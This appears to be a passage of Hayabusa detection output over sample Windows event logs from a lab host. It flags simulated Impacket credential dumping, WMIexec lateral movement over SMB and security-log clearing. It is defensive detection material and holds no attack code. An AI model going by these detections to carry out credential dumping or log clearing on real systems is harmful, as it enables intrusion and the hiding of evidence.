-2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret 
dump via SMB.evtx" -2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
-2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 
0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.483 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 
via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.546 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
__1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : 
Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : 
LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 
